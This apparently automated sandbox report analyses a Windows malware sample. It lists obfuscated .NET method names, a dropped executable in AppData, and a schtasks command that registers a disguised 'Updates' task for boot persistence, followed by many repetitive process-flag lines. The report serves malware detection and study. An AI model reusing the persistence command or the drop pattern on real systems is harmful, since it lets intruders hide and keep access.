Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, GSP44nB6VM63cs9A1M.cs	High entropy of concatenated method names: 'QHa1UQJaCO', 'Pvq1xx3Q9J', 'DSZ1JET7Hv', 'RVo1AZl3jx', 'fIe1hfs4kJ', 'EcyJmuG02C', 'znnJ9u0bli', 'HDLJD9Z9NS', 'y63JTN8yBF', 'uNUJYyGwgY'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, kpXV5BvNYnN2J32gRE.cs	High entropy of concatenated method names: 'JVsJXhJ6iN', 'sjXJige1oP', 'VEy36BAyCC', 'jhY34i4E2W', 'QCa32Bdysb', 'irZ3Kj2HWs', 'O063PXPYcw', 'iED35xigtc', 'CAw3QHe4eV', 'u6Q3fCp0Po'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, mS6gZkYdVOZrKGG8hX.cs	High entropy of concatenated method names: 'J7AaBq5AmW', 'Q23acaNdj4', 'rYRa64TZ1g', 'vOLa41x1MQ', 'f51a252qY4', 'rrpaKApV4F', 'JwraPJx0dK', 'uLSa55YIvQ', 'O1ZaQh8Spu', 'crpaf19yCs'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, u07XDpgHpxVYHUppXV.cs	High entropy of concatenated method names: 'kHc3lQmyVa', 'dB63nZmol5', 'z413VFn9Dt', 'Xx33gD07FC', 'i203HsBgeA', 'TJ43bOSgTH', 'UaY3RkSaZR', 'ePx3tyKF3h', 'Jsf3ay0Ydt', 'E0N3jsBiZw'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, JpsTIeV6A7NfgyrDkl.cs	High entropy of concatenated method names: 'yi0xIMAFtt', 'uXhxSVs1Wf', 'd5HxWcy9VZ', 'na4xd6726b', 'yjmxmZ9Idw', 't0Tx9iWqVK', 'XCExDFEmj2', 'DToxTnSAZq', 'HVExY6aFDK', 'np3x88dtgq'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, F6ARVpzaNnUQdyao3j.cs	High entropy of concatenated method names: 'YBTjntpLlo', 'V7wjVmXXrR', 'HiLjg7UDxI', 'rH3jBgFOhe', 'H3fjcYhEsK', 'YGTj4APm3d', 'MCxj2W3V9Z', 'khJjo0esdV', 'CK4jEgFsP1', 's2xjGvBeqv'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs	High entropy of concatenated method names: 'hDJNUEHoo9', 'mXZNZWmFmn', 'PZhNx6iguh', 'lHiN3FYVm9', 'CQlNJKnFK9', 'Ga6N1xn8FL', 'BpSNAgnXth', 'RMxNhATRlq', 'xAlNwIukUO', 'gLONFSnbeD'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, kPeThipR6kgr26coax.cs	High entropy of concatenated method names: 'abxCViXfl6', 'OU9CgfWPqo', 'XInCB2dqKc', 'vmSCcKhNYa', 'T3NC4CFstu', 'irpC2DmQDS', 'J8eCPDvBaD', 'GPyC5W63TT', 'XZBCf6mEgD', 'VlqCugba9s'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, dpeYSjP1UMv2qXuK2B.cs	High entropy of concatenated method names: 'dsDAZ6kYw4', 'B6tA3v8m86', 'TXrA1IqkEQ', 'cQ218PnGSy', 'VgP1zIWbxK', 'MYbAyAOmFK', 'hZpArtyArd', 'mqMAeiPlLs', 'CUgANnPmdT', 'cirAqpJbbu'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, q5clipqBHqOnkVSmJl.cs	High entropy of concatenated method names: 'Lg2rApsTIe', 'HA7rhNfgyr', 'QHprFxVYHU', 'QpXr0VhpXV', 'h2grHREBSP', 'I4nrb6VM63', 'EhwZ7jm1RaItdGKwV4', 'OhGUIvPrI70fhZoKhO', 'K0VrrEMBZ4', 'DrWrNWXgI6'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, oXOgna9aQgAHxFpovw.cs	High entropy of concatenated method names: 'sCIRTU8oPy', 'vTCR8FNjAc', 'bVCtyDEGQq', 'IkRtrisgky', 'lppRuqNxqC', 'RUDRkK2cYo', 'VHSRprZkeV', 'UbsRIOm0Pn', 'zbERSwwe05', 'BvpRWCtFIZ'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, gUKDmLQMndPSRA3HBN.cs	High entropy of concatenated method names: 'E5GAEuKKof', 'DaTAG3Tqir', 'KETAM1BfAg', 'bVPAl0wNIn', 'RTDAXt4YeQ', 'CvKAnk2oCD', 'Cj5AimgKG0', 'MkrAVDUoFZ', 'MMiAgsyum4', 'LdKAvKgkF7'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, fNvmGLe0G2dhMMIpXW.cs	High entropy of concatenated method names: 'G9rMlBW2E', 'iGlltvWyi', 'sIGnFNdJQ', 'yIai4Ips9', 'Uh8gDDXqg', 'lLQvr9jDn', 'mVdqPLMcyw7HRWxGdv', 'kHVPf0RLuquZ21kiVD', 'SltoTaD97evxTboRMv', 'sGmttreK4'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, IabwK0xQXmYgZNDWfQ.cs	High entropy of concatenated method names: 'Dispose', 'ucarY9FiTe', 'DCoecf9Hyk', 'zcJESGHMNm', 'rD2r849Pkk', 'OtZrz6LtDO', 'ProcessDialogKey', 'UFFeyS6gZk', 'TVOerZrKGG', 'YhXeek1YV7'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, PTqIT3WJvtWp0iNXPt.cs	High entropy of concatenated method names: 'ToString', 'M33buN4nyo', 'ocmbcP1QRr', 'tlxb6NoSfq', 'UJUb4vITuF', 'tjXb26XYyg', 'KGLbKKSKaM', 'ocrbP3TKqf', 'QBhb5WkERo', 'FisbQqS9X6'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, x3lxZTDkOsca9FiTet.cs	High entropy of concatenated method names: 'e8caHRvfjc', 'h3haRka78F', 'zJJaaUHoCw', 'mr3aLP4XWp', 'Ua4aslXHH7', 'rYVaovyLYN', 'Dispose', 'bEYtZ57hlF', 'Rahtx8FWg1', 'MCyt3VJxaO'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, P1YV7U870rVYc4tCci.cs	High entropy of concatenated method names: 'zFij3dUluH', 'GmVjJRTjSu', 'W74j1J5qIN', 'VjUjA3LMsj', 't1Fja10DH9', 'xXTjh425mc', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, oCTbc7rrOLM3ykXKQk9.cs	High entropy of concatenated method names: 'nhKj82JbQ3', 'Bh3jzH6qUa', 'LEcLySmmlH', 'XDRLrin47M', 'nuALeZya4u', 'aMYLNuM0w4', 'KWrLqRwyt8', 'sYqLU9sgWK', 'CEMLZ3UUCI', 'wbELxssCkb'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, strlKMIZoyKBubENRm.cs	High entropy of concatenated method names: 'me6HfY8w0q', 'BVsHkR5PDN', 'N9uHIjf3re', 'UyfHS4dEos', 'ufVHc9pegC', 'woIH6nlYe1', 'kO5H4FRx7V', 'a7mH2tA4Th', 'W9lHKxUhii', 'tNeHP0PnLX'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, GSP44nB6VM63cs9A1M.cs	High entropy of concatenated method names: 'QHa1UQJaCO', 'Pvq1xx3Q9J', 'DSZ1JET7Hv', 'RVo1AZl3jx', 'fIe1hfs4kJ', 'EcyJmuG02C', 'znnJ9u0bli', 'HDLJD9Z9NS', 'y63JTN8yBF', 'uNUJYyGwgY'
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, kpXV5BvNYnN2J32gRE.cs	High entropy of concatenated method names: 'JVsJXhJ6iN', 'sjXJige1oP', 'VEy36BAyCC', 'jhY34i4E2W', 'QCa32Bdysb', 'irZ3Kj2HWs', 'O063PXPYcw', 'iED35xigtc', 'CAw3QHe4eV', 'u6Q3fCp0Po'

Source: C:\Users\user\Desktop\PvAmrCZENy.exe

File created: C:\Users\user\AppData\Roaming\yxXYABHh.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
